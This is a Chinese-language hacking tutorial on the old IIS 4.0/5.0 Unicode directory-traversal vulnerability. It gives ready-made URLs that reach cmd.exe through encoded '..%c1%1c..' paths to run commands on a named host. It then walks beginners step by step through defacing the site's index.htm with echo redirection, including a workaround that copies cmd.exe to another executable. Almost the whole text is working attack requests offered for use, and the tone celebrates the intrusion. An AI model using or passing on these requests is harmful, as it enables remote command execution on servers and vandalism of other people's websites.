IIS的Unicode漏洞攻擊

IIS有十多種常見漏洞，但利用得最多的莫過於Unicode解析錯誤漏洞。微軟IIS 4.0/5.0在Unicode字符解碼的實現中存在一個安全漏洞，用戶能夠遠程經過IIS執行任意命令。當IIS打開文件時，若是該文件名包含Unicode字符，它會對它進行解碼。若是用戶提供一些特殊的編碼，將致使IIS錯誤地打開或者執行某些Web根目錄之外的文件或程序。咱們此文就着重來說講如何利用這個漏洞入侵IIS。

　　對於IIS 4.0/5.0中文版，當IIS在收到的URL請求的文件名中，包含一個特殊的編碼例如「%c1%hh」或者「%c0%hh」，它會首先將其解碼變成「0xc10xhh」， 而後嘗試打開這個文件。Windows系統認爲「0xc10xhh」多是Unicode編碼，所以它會首先將其解碼，若是 「0x00<= %hh < 0x40」的話，採用的解碼的格式與下面的相似：

　　%c1%hh->(0xc1-0xc0)*0x40+0xhh

　　%c0%hh->(0xc0-0xc0)*0x40+0xhh

　　所以，利用這種編碼，咱們能夠構造不少字符，例如:

　　%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c='/'

　　%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f='\'

　　攻擊者能夠利用這個漏洞來繞過IIS的路徑檢查，去執行或者打開任意的文件。此漏洞從中文版IIS4.0+SP6開始，還影響中文版WIN2000+IIS5.0、中文版WIN2000+IIS5.0+SP1。

　　在NT4中「/」編碼爲「%c1%9c」；在英文版的WIN2000中爲「%c0%af」；在中文版的WIN2000裏是「%c1%1c」。此外還有多種編碼，不逐一闡述，你們能夠查查資料。本文均以WIN2000爲例，其餘類型請自行替換。

判斷是否存在漏洞

　　用該漏洞的掃描器來進行掃描是一種常見的方法。但咱們知道，掃描並非一個真正的黑客攻擊行爲，它只是一種尋找入口的方式。IIS的Unicode漏洞掃描器有不少，如RangeScan或者是unicodeScan均可以進行掃描以收集服務器信息。還有些綜合性的掃描軟件除了能發現Unicode漏洞以外，同時還能收集服務器的其它漏洞——X-Scan（下載地址：http://bitscn.com/upload/X-Scan-v3.1-cn.rar）。

　　固然也能夠在IE瀏覽器中輸入如下語句來進行判斷：

　　http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

　　學過DOS的應該能夠看懂，其實就是利用當中的非法請求使咱們連到system32下，若是Inetpub目錄不和Winnt在同一盤符，或者目錄級數有改動，就可能會引發請求失敗。

　　若是存在漏洞，那麼在瀏覽區可看到以下相似信息：

　　Directory of C:\inetpub\scripts

　　2005-03-05 15:49 〈DIR〉 .

　　2005-09-05 15:49 〈DIR〉 ..

　　是否是有本身機器的感受了，正點！要的就是這種感受！

　　cmd.exe至關於DOS裏的command.com，所以，咱們能夠執行不少命令了！

　　注意：在上面輸入的判斷語句中，「/c」後面的「+」，其實是空格，請記牢！dir是DOS中的查看文件和目錄命令，不懂DOS的朋友快去學習。

　　看了上面的介紹，不用說你們也知道咱們能夠利用此漏洞對服務器展開攻擊了！

修改網站首頁

1．肯定網站首頁名稱

　　通常網站默認首頁文件爲index.htm、index.html、index.asp、default.htm、defautl.html或default.asp中的一個，咱們能夠經過輸入不一樣的首頁名稱來測試並肯定要修改的網站首頁。在IE地址欄中輸入如下三個網址：

　　http://aa.feedom.net/index.html

　　http://aa.feedom.net/default.asp

　　http://aa.feedom.net/index.htm

　　經過對上面三個網址的測試，咱們發現只有第三個網址能夠正常打開，說明這個網站的首頁名稱爲index.htm。好了，那麼咱們就修改它吧！

2．修改原理

　　最方便的方法是echo法：echo是一個系統命令，主要用於設置迴應開關。

　　echo test >c:\autoexec.bat就是把test加入autoexec.bat裏並刪除原有內容；

　　echo timedate >>c:\autoexec.bat就是加入timedate但不刪除原有內容。

　　明白了嗎？接下來咱們就能夠逍遙地修改了。

3．更改網站首頁

　　在IE中輸入如下地址：

　　http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+ HaHaThisismyhack +>c:\inetpub\wwwroot\index.htm

　　IE瀏覽器返回來的結果可能爲如下兩種狀況之一：

　　1）HTTP 500 - 內部服務器錯誤

　　2）The parameter is incorrect

　　經過返回信息提示和對CMD的分析,多是命令語句中參數錯誤,加入"符號再試試：

　　1） http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ HaHaThisismyhack +>c:\inetpub\wwwroot\index.htm

　　表示把HaHaThisismyhack加入到index.htm文件並刪除原有內容。

　　2）http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+ by2005-3-9+>>c:\inetpub\wwwroot\index.htm

　　表示把by2005-3-9加入到index.htm文件中,但不刪除原有內容。

　　若是正常,上面兩條語句的迴應應該都爲CGI錯誤，這表示語句執行成功了，系統只是程序性地報個錯誤，不用理會它。

　　如今再來打開網站aa.feedom.net看看吧,怎麼樣了，是否是被你改掉了？在實際操做中，因爲目錄權限等網管因素的存在，可能這個方法也會失效，這時，咱們就能夠用copy cmd.exe 爲另外一個.exe文件的方式解決，不過要記住路徑，別出錯了，例如：

　　http://aa.feedom.net/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

　　http://aa.feedom.net/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

　　本文講到的技術比較簡單，很適合初學者研究和學習。也許你經過本文的實例方式，已經能修改咱們提供的服務器首頁了，可是在實際操做中，服務器環境必然有變化，並且障礙也許是你不曾研究或接觸過的。因此只有緊緊地掌握了基礎知識才有進階的資本。你們能夠根據文中提到的知識點查閱資料輔助學習。